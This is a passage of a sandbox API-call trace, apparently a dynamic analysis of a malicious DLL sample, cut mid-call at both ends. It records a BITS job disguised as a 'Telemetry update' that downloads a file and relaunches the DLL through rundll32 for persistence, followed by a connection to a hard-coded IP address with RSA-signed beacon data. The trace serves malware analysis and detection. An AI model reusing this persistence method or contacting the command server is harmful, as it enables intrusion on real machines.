lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DllRegisterServer", lpUsedDefaultChar=0x0) returned 18 [0093.905] GetLastError () returned 0x0 [0093.905] SetLastError (dwErrCode=0x0) [0093.905] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="DllRegisterServerW") returned 0x0 [0093.905] GetLastError () returned 0x7f [0093.905] SetLastError (dwErrCode=0x7f) [0093.905] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="DllRegisterServerA") returned 0x0 [0093.905] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="DllRegisterServer") returned 0x7ffc45e910d0 [0093.905] GetActiveWindow () returned 0x0 [0093.908] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetSystemDefaultLangID") returned 0x7ffc5ecf8d90 [0093.908] GetSystemDefaultLangID () returned 0x409 [0093.909] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0093.909] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0093.909] GetProcessHeap () returned 0x440000 [0093.909] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x8) returned 0x443cc0 [0093.909] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="GetKeyboardLayoutList") returned 0x7ffc5e9929a0 [0093.909] GetKeyboardLayoutList (in: nBuff=1, lpList=0x443cc0 | out: lpList=0x443cc0) returned 1 [0093.909] GetProcessHeap () returned 0x440000 [0093.909] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x443cc0 | out: hHeap=0x440000) returned 1 [0093.909] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 0x7ffc5ecfd6e0 [0093.909] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{a4f25aea-0e06-40f9-81b2-53370f3faa31}") returned 0x17c [0093.910] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0093.910] GetLastError () returned 0x0 [0093.910] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0093.910] CloseHandle (hObject=0x17c) returned 1 [0093.910] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateMutexA") returned 0x7ffc5ecfd6e0 [0093.910] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{4b03c46d-9a60-4fba-bdeb-7fc0f42c98fa}") returned 0x17c [0093.911] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetLastError") returned 0x7ffc5eceb710 [0093.911] GetLastError () returned 0x0 [0093.911] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0093.911] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x180013980, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0093.911] GetProcAddress (hModule=0x7ffc5e3e0000, lpProcName="CoInitializeEx") returned 0x7ffc5f322c50 [0093.911] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0094.735] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetCommandLineW") returned 0x7ffc5ecf6a00 [0094.735] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllRegisterServer" [0094.735] GetProcAddress (hModule=0x7ffc5cc80000, lpProcName="CommandLineToArgvW") returned 0x7ffc5cd21050 [0094.735] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllRegisterServer", pNumArgs=0x14fb94 | out: pNumArgs=0x14fb94) returned 0x44aed0*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0094.735] lstrcpyW (in: lpString1=0x14fc70, lpString2="regsvr32" | out: lpString1="regsvr32") returned="regsvr32" [0094.735] lstrcpyW (in: lpString1=0x14fc90, lpString2="rundll32" | out: lpString1="rundll32") returned="rundll32" [0094.735] lstrcpyW (in: lpString1=0x14fc46, lpString2=".exe" | out: lpString1=".exe") returned=".exe" [0094.736] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="PathFindFileNameW") returned 0x7ffc5e7bbc60 [0094.736] PathFindFileNameW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe") returned="GIUmlOL.exe" [0094.743] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0094.743] lstrlenW (lpString="GIUmlOL.exe") returned 11 [0094.743] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrStrIW") returned 0x7ffc5e7bcf90 [0094.743] StrStrIW (lpFirst="GIUmlOL.exe", lpSrch="rundll32") returned 0x0 [0094.743] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrStrIW") returned 0x7ffc5e7bcf90 [0094.743] StrStrIW (lpFirst="GIUmlOL.exe", lpSrch="regsvr32") returned 0x0 [0094.743] lstrcpyW (in: lpString1=0x180013f98, lpString2="DllRegisterServer" | out: lpString1="DllRegisterServer") returned="DllRegisterServer" [0094.749] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetSystemWindowsDirectoryW") returned 0x7ffc5ece9490 [0094.749] GetSystemWindowsDirectoryW (in: lpBuffer=0x180013980, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0094.750] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\System32\\rundll32.exe" | out: lpString1="C:\\Windows\\System32\\rundll32.exe") returned="C:\\Windows\\System32\\rundll32.exe" [0094.750] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LocalFree") returned 0x7ffc5ecedd10 [0094.750] LocalFree (hMem=0x44aed0) returned 0x0 [0094.750] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetTempPathW") returned 0x7ffc5ecfdb50 [0094.750] GetTempPathW (in: nBufferLength=0x111, lpBuffer=0x14f850 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0094.750] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetTempFileNameW") returned 0x7ffc5ecfdb30 [0094.750] GetTempFileNameW (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x14f850 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\5A65.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\5a65.tmp")) returned 0x5a65 [0094.754] lstrcpyW (in: lpString1=0x14f7b0, lpString2="https://microsoft.com/telemetry/update.exe" | out: lpString1="https://microsoft.com/telemetry/update.exe") returned="https://microsoft.com/telemetry/update.exe" [0094.754] lstrcpyW (in: lpString1=0x14f750, lpString2="Telemetry update" | out: lpString1="Telemetry update") returned="Telemetry update" [0094.754] GetProcAddress (hModule=0x7ffc5e3e0000, lpProcName="CoCreateInstance") returned 0x7ffc5f35fb70 [0094.754] CoCreateInstance (in: rclsid=0x180012050*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0x180012040*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0x14f658 | out: ppv=0x14f658*=0x2c8a048) returned 0x0 [0120.411] IBackgroundCopyManager:CreateJob (in: This=0x2c8a048, DisplayName="Telemetry update", Type=0x0, pJobId=0x14f690, ppJob=0x14f660 | out: pJobId=0x14f690*(Data1=0xdf6cb9bd, Data2=0x505a, Data3=0x4aa5, Data4=([0]=0x84, [1]=0x7, [2]=0x90, [3]=0xce, [4]=0x92, [5]=0x10, [6]=0x5f, [7]=0x85)), ppJob=0x14f660*=0x2c8a0b8) returned 0x0 [0122.226] IBackgroundCopyJob:AddFile (This=0x2c8a0b8, RemoteUrl="https://microsoft.com/telemetry/update.exe", LocalName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\5A65.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\5a65.tmp")) returned 0x0 [0130.883] IBackgroundCopyJob:SetMinimumRetryDelay (This=0x2c8a0b8, Seconds=0x2a30) returned 0x0 [0130.886] IBackgroundCopyJob:SetNoProgressTimeout (This=0x2c8a0b8, Seconds=0x0) returned 0x0 [0130.887] IUnknown:QueryInterface (in: This=0x2c8a0b8, riid=0x180012060*(Data1=0x54b50739, Data2=0x686f, Data3=0x45eb, Data4=([0]=0x9d, [1]=0xff, [2]=0xd6, [3]=0xa9, [4]=0xa0, [5]=0xfa, [6]=0xa9, [7]=0xaf)), ppvObject=0x14f650 | out: ppvObject=0x14f650*=0x2c8a128) returned 0x0 [0131.589] GetProcAddress (hModule=0x7ffc5e3e0000, lpProcName="StringFromCLSID") returned 0x7ffc5f301820 [0131.589] StringFromCLSID (in: rclsid=0x14f690*(Data1=0xdf6cb9bd, Data2=0x505a, Data3=0x4aa5, Data4=([0]=0x84, [1]=0x7, [2]=0x90, [3]=0xce, [4]=0x92, [5]=0x10, [6]=0x5f, [7]=0x85)), lplpsz=0x14f688 | out: lplpsz=0x14f688*="{DF6CB9BD-505A-4AA5-8407-90CE92105F85}") returned 0x0 [0131.589] lstrlenW (lpString="C:\\Windows\\System32\\rundll32.exe") returned 32 [0131.589] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 98 [0131.589] lstrlenW (lpString="DllRegisterServer") returned 17 [0131.589] lstrlenW (lpString="{DF6CB9BD-505A-4AA5-8407-90CE92105F85}") returned 38 [0131.589] GetProcessHeap () returned 0x440000 [0131.589] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x17a) returned 0x2c93340 [0131.589] lstrcpyW (in: lpString1=0x14f6a0, lpString2="%s %s,%s %s" | out: lpString1="%s %s,%s %s") returned="%s %s,%s %s" [0131.589] wsprintfW (in: param_1=0x2c93340, param_2="%s %s,%s %s" | out: param_1="C:\\Windows\\System32\\rundll32.exe C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll,DllRegisterServer {DF6CB9BD-505A-4AA5-8407-90CE92105F85}") returned 188 [0131.590] GetProcAddress (hModule=0x7ffc5e3e0000, lpProcName="CoTaskMemFree") returned 0x7ffc5f33d2c0 [0131.590] CoTaskMemFree (pv=0x2c74a30) [0131.590] IBackgroundCopyJob2:SetNotifyCmdLine (This=0x2c8a128, Program="C:\\Windows\\System32\\rundll32.exe", Parameters="C:\\Windows\\System32\\rundll32.exe C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll,DllRegisterServer {DF6CB9BD-505A-4AA5-8407-90CE92105F85}") returned 0x0 [0132.360] GetProcessHeap () returned 0x440000 [0132.360] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c93340 | out: hHeap=0x440000) returned 1 [0132.360] IBackgroundCopyJob:SetNotifyFlags (This=0x2c8a128, Val=0x2) returned 0x0 [0132.544] IBackgroundCopyJob:Resume (This=0x2c8a128) returned 0x0 [0132.749] IUnknown:Release (This=0x2c8a128) returned 0x1 [0132.749] IUnknown:Release (This=0x2c8a048) returned 0x0 [0132.753] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0132.753] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x14fae0, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x14fae0) returned 0x0 [0132.756] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0132.756] Sleep (dwMilliseconds=0x1206a) [0142.759] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenA") returned 0x7ffc510aa3b0 [0142.759] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0143.474] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="InitializeCriticalSection") returned 0x7ffc5f87ced0 [0143.475] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateThread") returned 0x7ffc5ecf16f0 [0143.475] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1800060e0, lpParameter=0x14fcb8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c4 [0143.478] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0143.478] lstrcpyW (in: lpString1=0x14fa2a, lpString2="RSA" | out: lpString1="RSA") returned="RSA" [0143.478] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x7ffc5bcc3b50 [0143.478] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x14fb18, pszAlgId="RSA", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x14fb18) returned 0x0 [0143.480] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0143.480] lstrcpyW (in: lpString1=0x14fa32, lpString2="SHA384" | out: lpString1="SHA384") returned="SHA384" [0143.480] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x7ffc5bcc3b50 [0143.480] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x14fb20, pszAlgId="SHA384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x14fb20) returned 0x0 [0143.480] GetProcessHeap () returned 0x440000 [0143.480] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x11b) returned 0x2ca8b20 [0143.770] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="RtlCopyMemory") returned 0x7ffc5f8bb240 [0143.771] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="RtlCopyMemory") returned 0x7ffc5f8bb240 [0143.771] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0143.771] lstrcpyW (in: lpString1=0x14f990, lpString2="RSAPUBLICBLOB" | out: lpString1="RSAPUBLICBLOB") returned="RSAPUBLICBLOB" [0143.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptImportKeyPair") returned 0x7ffc5bcc30e0 [0143.771] BCryptImportKeyPair (in: hAlgorithm=0x2ca8710, hImportKey=0x0, pszBlobType="RSAPUBLICBLOB", phKey=0x14fb28, pbInput=0x2ca8b20, cbInput=0x11b, dwFlags=0x0 | out: phKey=0x14fb28) returned 0x0 [0143.771] GetProcessHeap () returned 0x440000 [0143.772] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ca8b20 | out: hHeap=0x440000) returned 1 [0143.772] GetProcessHeap () returned 0x440000 [0143.772] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x49b) returned 0x2cad3c0 [0143.772] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="RtlCopyMemory") returned 0x7ffc5f8bb240 [0143.772] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="RtlCopyMemory") returned 0x7ffc5f8bb240 [0143.772] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0143.772] lstrcpyW (in: lpString1=0x14f990, lpString2="RSAFULLPRIVATEBLOB" | out: lpString1="RSAFULLPRIVATEBLOB") returned="RSAFULLPRIVATEBLOB" [0143.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptImportKeyPair") returned 0x7ffc5bcc30e0 [0143.772] BCryptImportKeyPair (in: hAlgorithm=0x2ca8710, hImportKey=0x0, pszBlobType="RSAFULLPRIVATEBLOB", phKey=0x14fb30, pbInput=0x2cad3c0, cbInput=0x49b, dwFlags=0x0 | out: phKey=0x14fb30) returned 0x0 [0143.774] GetProcessHeap () returned 0x440000 [0143.774] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2cad3c0 | out: hHeap=0x440000) returned 1 [0143.774] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0143.774] lstrcpyW (in: lpString1=0x14f9c0, lpString2="BlockLength" | out: lpString1="BlockLength") returned="BlockLength" [0143.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGetProperty") returned 0x7ffc5bcc20b0 [0143.774] BCryptGetProperty (in: hObject=0x2c82d70, pszProperty="BlockLength", pbOutput=0x14f9b8, cbOutput=0x4, pcbResult=0x14f9bc, dwFlags=0x0 | out: pbOutput=0x14f9b8, pcbResult=0x14f9bc) returned 0x0 [0143.774] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetSystemTime") returned 0x7ffc5ecf0580 [0143.774] GetSystemTime (in: lpSystemTime=0x14fa20 | out: lpSystemTime=0x14fa20*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x2, wDay=0x1c, wHour=0x6, wMinute=0x29, wSecond=0x0, wMilliseconds=0x3ce)) [0143.775] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetDateFormatEx") returned 0x7ffc5ed15e40 [0143.776] GetDateFormatEx (in: lpLocaleName="", dwFlags=0x80000002, lpDate=0x14fa10, lpFormat=0x0, lpDateStr=0x0, cchDate=0, lpCalendar=0x0 | out: lpDateStr=0x0) returned 27 [0143.776] GetProcessHeap () returned 0x440000 [0143.776] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x36) returned 0x2c89360 [0143.776] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetDateFormatEx") returned 0x7ffc5ed15e40 [0143.776] GetDateFormatEx (in: lpLocaleName="", dwFlags=0x80000002, lpDate=0x14fa10, lpFormat=0x0, lpDateStr=0x2c89360, cchDate=27, lpCalendar=0x0 | out: lpDateStr="Tuesday, 28 September 2021") returned 27 [0143.776] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WideCharToMultiByte") returned 0x7ffc5eceb490 [0143.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tuesday, 28 September 2021", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0143.777] GetProcessHeap () returned 0x440000 [0143.777] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1b) returned 0x2c82da0 [0143.777] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WideCharToMultiByte") returned 0x7ffc5eceb490 [0143.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tuesday, 28 September 2021", cchWideChar=27, lpMultiByteStr=0x2c82da0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tuesday, 28 September 2021", lpUsedDefaultChar=0x0) returned 27 [0143.777] GetProcessHeap () returned 0x440000 [0143.777] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c89360 | out: hHeap=0x440000) returned 1 [0143.777] lstrlenA (lpString="Tuesday, 28 September 2021") returned 26 [0143.777] lstrcpyW (in: lpString1=0x14f950, lpString2="ObjectLength" | out: lpString1="ObjectLength") returned="ObjectLength" [0143.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGetProperty") returned 0x7ffc5bcc20b0 [0143.777] BCryptGetProperty (in: hObject=0x2ca89e0, pszProperty="ObjectLength", pbOutput=0x14f948, cbOutput=0x4, pcbResult=0x14f94c, dwFlags=0x0 | out: pbOutput=0x14f948, pcbResult=0x14f94c) returned 0x0 [0143.777] GetProcessHeap () returned 0x440000 [0143.777] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x196) returned 0x2ca9e30 [0143.777] lstrcpyW (in: lpString1=0x14f970, lpString2="HashDigestLength" | out: lpString1="HashDigestLength") returned="HashDigestLength" [0143.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGetProperty") returned 0x7ffc5bcc20b0 [0143.777] BCryptGetProperty (in: hObject=0x2ca89e0, pszProperty="HashDigestLength", pbOutput=0x14f944, cbOutput=0x4, pcbResult=0x14f94c, dwFlags=0x0 | out: pbOutput=0x14f944, pcbResult=0x14f94c) returned 0x0 [0143.777] GetProcessHeap () returned 0x440000 [0143.777] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x30) returned 0x2c88de0 [0143.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptCreateHash") returned 0x7ffc5bcc1da0 [0143.778] BCryptCreateHash (in: hAlgorithm=0x2ca89e0, phHash=0x14f918, pbHashObject=0x2ca9e30, cbHashObject=0x196, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x2ca89e0, phHash=0x14f918, pbHashObject=0x2ca9e30) returned 0x0 [0143.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptHashData") returned 0x7ffc5bcc1010 [0143.778] BCryptHashData (in: hHash=0x2ca9e30, pbInput=0x2c82da0, cbInput=0x1a, dwFlags=0x0 | out: hHash=0x2ca9e30) returned 0x0 [0143.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptFinishHash") returned 0x7ffc5bcc1a30 [0143.778] BCryptFinishHash (in: hHash=0x2ca9e30, pbOutput=0x2c88de0, cbOutput=0x30, dwFlags=0x0 | out: hHash=0x2ca9e30, pbOutput=0x2c88de0) returned 0x0 [0143.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDestroyHash") returned 0x7ffc5bcc15e0 [0143.779] BCryptDestroyHash (in: hHash=0x2ca9e30 | out: hHash=0x2ca9e30) returned 0x0 [0143.779] GetProcessHeap () returned 0x440000 [0143.779] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ca9e30 | out: hHeap=0x440000) returned 1 [0143.779] lstrlenA (lpString="https://161.35.19.83:443") returned 24 [0143.779] GetProcessHeap () returned 0x440000 [0143.780] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x18) returned 0x2ca67b0 [0143.780] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetCrackUrlA") returned 0x7ffc510a57d0 [0143.780] InternetCrackUrlA (in: lpszUrl="https://161.35.19.83:443", dwUrlLength=0x18, dwFlags=0x0, lpUrlComponents=0x14f9e0 | out: lpUrlComponents=0x14f9e0) returned 1 [0143.780] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetConnectA") returned 0x7ffc511a6d40 [0143.780] InternetConnectA (hInternet=0xcc0004, lpszServerName="161.35.19.83", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0143.781] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetSystemTime") returned 0x7ffc5ecf0580 [0143.781] GetSystemTime (in: lpSystemTime=0x14f940 | out: lpSystemTime=0x14f940*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x2, wDay=0x1c, wHour=0x6, wMinute=0x29, wSecond=0x0, wMilliseconds=0x3d5)) [0143.781] lstrcpyW (in: lpString1=0x14f8b2, lpString2="SHA384" | out: lpString1="SHA384") returned="SHA384" [0143.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptSignHash") returned 0x7ffc5bccb730 [0143.781] BCryptSignHash (in: hKey=0x2c82b00, pPaddingInfo=0x14f8a0, pbInput=0x2c88de0, cbInput=0x30, pbOutput=0x0, cbOutput=0x0, pcbResult=0x14f89c, dwFlags=0x2 | out: pbOutput=0x0, pcbResult=0x14f89c) returned 0x0 [0143.781] GetProcessHeap () returned 0x440000 [0143.781] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x100) returned 0x2c962a0 [0143.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptSignHash") returned 0x7ffc5bccb730 [0143.782] BCryptSignHash (in: hKey=0x2c82b00, pPaddingInfo=0x14f8a0, pbInput=0x2c88de0, cbInput=0x30, pbOutput=0x2c962a0, cbOutput=0x100, pcbResult=0x14f89c, dwFlags=0x2 | out: pbOutput=0x2c962a0, pcbResult=0x14f89c) returned 0x0 [0143.784] GetProcAddress (hModule=0x7ffc5c190000, lpProcName="CryptBinaryToStringA") returned 0x7ffc5c19dbd0 [0143.784] CryptBinaryToStringA (in: pbBinary=0x2c962a0, cbBinary=0x100, dwFlags=0x40000001, pszString=0x0, pcchString=0x14f80c | out: pszString=0x0, pcchString=0x14f80c) returned 1 [0143.784] GetProcessHeap () returned 0x440000 [0143.784] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x159) returned 0x2ca9e30 [0143.785] GetProcAddress (hModule=0x7ffc5c190000, lpProcName="CryptBinaryToStringA") returned 0x7ffc5c19dbd0 [0143.785] CryptBinaryToStringA (in: pbBinary=0x2c962a0, cbBinary=0x100, dwFlags=0x40000001, pszString=0x2ca9e30, pcchString=0x14f80c | out: pszString="gq8ZNbDF5ks85z4P+IMaH/zRLe46r7/+hnn/pDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C/CCbYOrfYNipK+2Zc6aerq5aAq/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", pcchString=0x14f80c) returned 1 [0143.785] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0143.785] lstrlenA (lpString="gq8ZNbDF5ks85z4P+IMaH/zRLe46r7/+hnn/pDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C/CCbYOrfYNipK+2Zc6aerq5aAq/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==") returned 344 [0143.785] GetProcessHeap () returned 0x440000 [0143.785] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x17d) returned 0x2cae6e0 [0143.785] StrCSpnA (lpStr="gq8ZNbDF5ks85z4P+IMaH/zRLe46r7/+hnn/pDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C/CCbYOrfYNipK+2Zc6aerq5aAq/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", lpSet="+/=") returned 16 [0143.788] StrSpnA (psz="+IMaH/zRLe46r7/+hnn/pDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C/CCbYOrfYNipK+2Zc6aerq5aAq/5DlAaVWkC3UqSbjwPa87rS4RRJ/gQ+hUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s+RYlVzgQTpYz2w2ApzBXhbNaHx6H+PNhSnIBxjhUJh+EnfERdY3/ereScY2VGlOIu9kQN2qSQB6cX/ydHVs9oYSGgbalJ9/KRtZmA==", pszSet="+/=") returned 1 [0143.788] StrCSpnA 